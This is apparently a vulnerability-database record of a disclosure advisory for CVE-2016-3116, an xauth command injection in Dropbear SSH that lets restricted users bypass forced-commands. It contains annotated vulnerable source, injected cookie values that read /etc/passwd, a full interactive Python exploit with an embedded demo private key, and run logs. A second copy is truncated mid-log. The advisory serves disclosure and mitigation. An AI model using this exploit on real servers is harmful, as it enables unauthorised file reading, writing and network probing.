* https://matt.ucc.asn.au/dropbear/dropbear.html [1] \n \nVersion: 2015.71 \nLatest Version: 2015.71 \nOther Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years) \nPlatform(s): linux \nTechnology: c \n \nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') \nOrigin: remote \nMin. Privs.: post auth \n \nCVE: CVE-2016-3116 \n \n \n \nDescription \n--------- \n \nquote website [1] \n \n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. \n \nSummary \n------- \n \nAn authenticated user may inject arbitrary xauth commands by sending an \nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. \n \nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be \nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restriction. This is generally not expected. \n \nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n \nQuick-Info: \n \n* requires: X11Forwarding yes \n* does *NOT* bypass /bin/false due to special treatment (like nologin) \n* bypasses forced-commands (allows arbitr. read/write) \n \nCapabilities (xauth): \n \n* Xauth \n* write file: limited chars, xauthdb format \n* read file: limit lines cut at first \\s \n* infoleak: environment \n* connect to other devices (may allow port probing) \n \n \nPoC see ref github. \n \n \nDetails \n------- \n \n// see annotated code below \n \n* x11req (svr-x11fwd.c:46) \n \n* execchild (svr-chansession.c:893) \n*- x11setauth (svr-x11fwd.c:129) \n \nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request \nparameters `x11authprot` and `x11authcookie` from the client ssh packet where \n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) \nand `x11authcookie` contains the actual x11 auth cookie. This information is stored \nin a session specific datastore. When calling `execute` on that session, dropbear will \ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding \nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`. \nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains \nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a \ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary \n`xauth` commands. \n \nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth \ncommand injection: \n \nSYNOPSIS \nxauth [ -f authfile ] [ -vqibn ] [ command arg ... ] \n \nadd displayname protocolname hexkey \ngenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] \n[n]extract filename displayname... \n[n]list [displayname...] \n[n]merge [filename...] \nremove displayname... \nsource filename \ninfo \nexit \nquit \nversion \nhelp \n? \n \nInteresting commands are: \n \ninfo - leaks environment information / path \n~# xauth info \nxauth: file /root/.Xauthority does not exist \nAuthority file: /root/.Xauthority \nFile new: yes \nFile locked: no \nNumber of entries: 0 \nChanges honored: yes \nChanges made: no \nCurrent input: (argv):1 \n \nsource - arbitrary file read (cut on first `\\s`) \n# xauth source /etc/shadow \nxauth: file /root/.Xauthority does not exist \nxauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\" \n \nextract - arbitrary file write \n* limited characters \n* in xauth.db format \n* since it is not compressed it can be combined with `xauth add` to \nfirst store data in the database and then export it to an arbitrary \nlocation e.g. to plant a shell or do other things. \n \ngenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit \nvulnerabilities in X.org \n \n \nSource \n------ \n \nInline annotations are prefixed with `//#!` \n \n* handle x11 request, stores cookie in `chansess` \n \n/* called as a request for a session channel, sets up listening X11 */ \n/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */ \nint x11req(struct ChanSess * chansess) { \n \nint fd; \n \n/* we already have an x11 connection */ \nif (chansess->x11listener != NULL) { \nreturn DROPBEAR_FAILURE; \n} \n \nchansess->x11singleconn = buf_getbyte(ses.payload); \nchansess->x11authprot = buf_getstring(ses.payload, NULL); //#! store user tainted data \nchansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! store user tainted data \nchansess->x11screennum = buf_getint(ses.payload); \n \n* set auth cookie/authprot \n \n/* This is called after switching to the user, and sets up the xauth \n* and environment variables. */ \nvoid x11setauth(struct ChanSess *chansess) { \n \nchar display[20]; /* space for \"localhost:12345.123\" */ \nFILE * authprog = NULL; \nint val; \n \nif (chansess->x11listener == NULL) { \nreturn; \n} \n \n... \n \n/* popen is a nice function - code is strongly based on OpenSSH's */ \nauthprog = popen(XAUTH_COMMAND, \"w\"); //#! run xauth binary \nif (authprog) { \nfprintf(authprog, \"add %s %s %s\\n\", \ndisplay, chansess->x11authprot, chansess->x11authcookie); //#! \\n injection in cookie, authprot \npclose(authprog); \n} else { \nfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND); \n} \n} \n \nProof of Concept \n---------------- \n \nPrerequisites: \n \n* install python 2.7.x \n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x \n* run `poc.py` \n \nNote: see cve-2016-3115 [3] for `poc.py` \n \nUsage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n \npoc: \n \n1. configure one user (user1) for `force-commands`: \n \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user1/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box \n \n#cat /etc/passwd \nuser1:x:1001:1001:,,,:/home/user1:/bin/bash \n \n2. run dropbearsshd (x11fwd is on by default) \n \n#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222 \n[22861] Not backgrounding \n[22862] Child connection from 192.168.139.1:49597 \n[22862] Forced command 'whoami' \n[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597 \n \n \n3. `forced-commands` - connect with user1 and display env information \n \n#> python <host> 22 user1 .demoprivkey \n \nINFO:__main__:add this line to your authorized_keys file: \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n \nINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .info \nDEBUG:__main__:auth_cookie: '\\ninfo' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:Authority file: /home/user1/.Xauthority \nFile new: no \nFile locked: no \nNumber of entries: 2 \nChanges honored: yes \nChanges made: no \nCurrent input: (stdin):2 \nuser1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n... \n \n4. `forced-commands` - read `/etc/passwd` \n \n... \n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \n... \n \n5. `forced-commands` - write `/tmp/testfile` \n \n#> .writefile /tmp/testfile1 `thisisatestfile` \nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:user1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n \n#> INFO:__main__:/tmp/testfile1 \n \n#> ls -lsat /tmp/testfile1 \n4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1 \n \n#> cat /tmp/testfile1 \n\\FA65500hi\\FA65500`thisisatestfile`\\AAr \n \n \n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100 \n \n#> generate 8.8.8.8:100 \nDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:user1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\". \n \n#> tcpdump \nIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0 \n \n \nMitigation / Workaround \n------------------------ \n \n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD` \n \nNotes \n----- \n \nThanks to the OpenSSH team for coordinating the fix! \n \nVendor response see: changelog [4] \n \n \nReferences \n---------- \n \n[1] https://matt.ucc.asn.au/dropbear/dropbear.html \n[2] http://linux.die.net/man/1/xauth \n[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/ \n[4] https://matt.ucc.asn.au/dropbear/CHANGES \n \n \n \n======= poc.py ======== \n \n#!/usr/bin/env python \n# -*- coding: UTF-8 -*- \n# Author : <github.com/tintinweb> \n############################################################################### \n# \n# FOR DEMONSTRATION PURPOSES ONLY! \n# \n############################################################################### \nimport logging \nimport StringIO \nimport sys \nimport os \n \nLOGGER = logging.getLogger(__name__) \ntry: \nimport paramiko \nexcept ImportError, ie: \nlogging.exception(ie) \nlogging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\") \nsys.exit(1) \n \nclass SSHX11fwdExploit(object): \ndef __init__(self, hostname, username, password, port=22, timeout=0.5, \npkey=None, pkey_pass=None): \nself.ssh = paramiko.SSHClient() \nself.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nif pkey: \npkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) \nself.ssh.connect(hostname=hostname, port=port, \nusername=username, password=password, \ntimeout=timeout, banner_timeout=timeout, \nlook_for_keys=False, pkey=pkey) \n \ndef exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"): \ntransport = self.ssh.get_transport() \nsession = transport.open_session() \nLOGGER.debug(\"auth_cookie: %s\"%repr(cmd)) \nsession.request_x11(auth_cookie=cmd) \nLOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\")) \n \ntransport.accept(0.5) \nsession.recv_exit_status() # block until exit code is ready \nstdout, stderr = [],[] \nwhile session.recv_ready(): \nstdout.append(session.recv(4096)) \nwhile session.recv_stderr_ready(): \nstderr.append(session.recv_stderr(4096)) \nsession.close() \nreturn ''.join(stdout)+''.join(stderr) # catch stdout, stderr \n \ndef exploit_fwd_readfile(self, path): \ndata = self.exploit(\"xxxx\\nsource %s\\n\"%path) \nif \"unable to open file\" in data: \nraise IOError(data) \nret = [] \nfor line in data.split('\\n'): \nst = line.split('unknown command \"',1) \nif len(st)==2: \nret.append(st[1].strip(' \"')) \nreturn '\\n'.join(ret) \n \ndef exploit_fwd_write_(self, path, data): \n''' \nadds display with protocolname containing userdata. badchars=<space> \n \n''' \ndummy_dispname = \"127.0.0.250:65500\" \nret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data)) \nif ret.count('bad \"add\" command line')>1: \nraise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data)) \nLOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname))) \nreturn path \n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY----- \nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 \n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn \nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN \nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts \nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh \nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH \nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W \ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O \naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne \neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T \nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA \nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe \nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj \nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc \nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 \n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY \nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw \nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM \nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f \nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr \nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ \nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL \nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX \nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV \npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv \n-----END RSA PRIVATE KEY-----\"\"\" \n \n \nif __name__==\"__main__\": \nlogging.basicConfig(loglevel=logging.DEBUG) \nLOGGER.setLevel(logging.DEBUG) \n \nif not len(sys.argv)>4: \nprint \"\"\" Usage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n\"\"\" \nsys.exit(1) \nhostname, port, username, password = sys.argv[1:] \nport = int(port) \npkey = None \nif os.path.isfile(password): \npassword = None \nwith open(password,'r') as f: \npkey = f.read() \nelif password==\".demoprivkey\": \npkey = PRIVKEY \npassword = None \nLOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys) \n \nLOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not pkey else \"<PKEY>\", hostname, port)) \nex = SSHX11fwdExploit(hostname, port=port, \nusername=username, password=password, \npkey=pkey, \ntimeout=10 \n) \nLOGGER.info(\"connected!\") \nLOGGER.info (\"\"\" \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n\"\"\") \nwhile True: \ncmd = raw_input(\"#> \").strip() \nif cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"): \nbreak \nelif cmd.lower().startswith(\".info\"): \nLOGGER.info(ex.exploit(\"\\ninfo\")) \nelif cmd.lower().startswith(\".readfile\"): \nLOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1])) \nelif cmd.lower().startswith(\".writefile\"): \nparts = cmd.split(\" \") \nLOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) \nelse: \nLOGGER.info(ex.exploit('\\n%s'%cmd)) \n \n# just playing around \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit(\"\\ninfo\") \n#print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000 \n#print ex.exploit(\"\\nlist\") \n#print ex.exploit(\"\\nnlist\") \n#print ex.exploit('\\nadd xx xx \"\\n') \n#print ex.exploit('\\ngenerate :0 . data \"') \n#print ex.exploit('\\n?\\n') \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\") \nLOGGER.info(\"--quit--\") \n \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136251/dropbearsshd-bypass.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDropBearSSHD 2015.71 - Command Injection", "edition": 1, "published": "2016-03-03T00:00:00", "title": "DropBearSSHD 2015.71 - Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115", "CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "href": "", "sourceData": "VuNote\n============\n\n\tAuthor:\t\t<github.com/tintinweb>\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\n\tVersion: \t0.2\n\tDate: \t\tMar 3rd, 2016\n\t\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\n\nOverview\n--------\n\n\tName:\t\t\tdropbear\n\tVendor:\t\t\tMatt Johnston\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\n\t\n\tVersion:\t\t2015.71\n\tLatest Version:\t2015.71\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\n\tPlatform(s):\tlinux\n\tTechnology:\t\tc\n\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\n\tOrigin:\t\t\tremote\n\tMin. Privs.:\tpost auth\n\n\tCVE:\t\t\tCVE-2016-3116\n\n\n\nDescription\n---------\n\nquote website [1]\n\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\n\nSummary \n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\n\nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restriction. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\n* bypasses forced-commands (allows arbitr. read/write)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limit lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nsee attached PoC\n\n\nDetails\n-------\n\n// see annotated code below\n\n\t* x11req (svr-x11fwd.c:46)\n \n * execchild (svr-chansession.c:893)\n *- x11setauth (svr-x11fwd.c:129)\n\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\nin a session specific datastore. When calling `execute` on that session, dropbear will\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo \n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: (argv):1\n\t\n\tsource\t - arbitrary file read (cut on first `\\s`)\n\t\t\t# xauth source /etc/shadow\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\n\t\t\t\t\t\t\n\textract - arbitrary file write \n\t\t\t * limited characters\n\t * in xauth.db format\n\t * since it is not compressed it can be combined with `xauth add` to \n\t first store data in the database and then export it to an arbitrary\n\t location e.g. to plant a shell or do other things.\n\t\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\n\t\t\t vulnerabilities in X.org\n\t\n\t\nSource\n------\n\nInline annotations are prefixed with `//#!`\n\n* handle x11 request, stores cookie in `chansess`\n\t```c\n\t/* called as a request for a session channel, sets up listening X11 */\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\n\tint x11req(struct ChanSess * chansess) {\n\t\n\t\tint fd;\n\t\n\t\t/* we already have an x11 connection */\n\t\tif (chansess->x11listener != NULL) {\n\t\t\treturn DROPBEAR_FAILURE;\n\t\t}\n\t\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\n\t\tchansess->x11screennum = buf_getint(ses.payload);\n\t```\n\t\n* set auth cookie/authprot\n\n\t```c\n\t/* This is called after switching to the user, and sets up the xauth\n\t * and environment variables. */\n\tvoid x11setauth(struct ChanSess *chansess) {\n\t\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\n\t\tFILE * authprog = NULL;\n\t\tint val;\n\t\n\t\tif (chansess->x11listener == NULL) {\n\t\t\treturn;\n\t\t}\n\t\n\t\t...\n\t\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\n\t\tif (authprog) {\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! \\n injection in cookie, authprot\n\t\t\tpclose(authprog);\n\t\t} else {\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\n\t\t}\n\t}\n\t```\n\nProof of Concept\n----------------\n\nPrerequisites: \n\n* install python 2.7.x\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\n* run `poc.py`\n\nNote: see cve-2016-3115 [3] for `poc.py`\n\n\t Usage: <host> <port> <username> <password or path_to_privkey>\n\t \n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\n\t \n\npoc:\n\n1. configure one user (user1) for `force-commands`:\n\t```c \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user1/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\n\n\t#cat /etc/passwd\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\n\t```\n\t \n2. run dropbearsshd (x11fwd is on by default)\n\n\t```c\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\n\t[22861] Not backgrounding\n\t[22862] Child connection from 192.168.139.1:49597\n\t[22862] Forced command 'whoami'\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\n\t```\t\n\n3. `forced-commands` - connect with user1 and display env information\n\n\t```c\n\t#> python <host> 2222 user1 .demoprivkey\n\t\n\tINFO:__main__:add this line to your authorized_keys file: \n\t#PUBKEY line - force commands: only allow \"whoami\"\n\t#cat /home/user/.ssh/authorized_keys\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\n\t\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\n\tINFO:__main__:connected!\n\tINFO:__main__:\n\tAvailable commands:\n\t .info\n\t .readfile <path>\n\t .writefile <path> <data>\n\t .exit .quit\n\t <any xauth command or type help>\n\t\n\t#> .info\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\n\tDEBUG:__main__:dummy exec returned: None\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\n\tFile new: no\n\tFile locked: no\n\tNumber of entries: 2\n\tChanges honored: yes\n\tChanges made: no\n\tCurrent input: (stdin):2\n\tuser1\n\t/usr/bin/xauth: 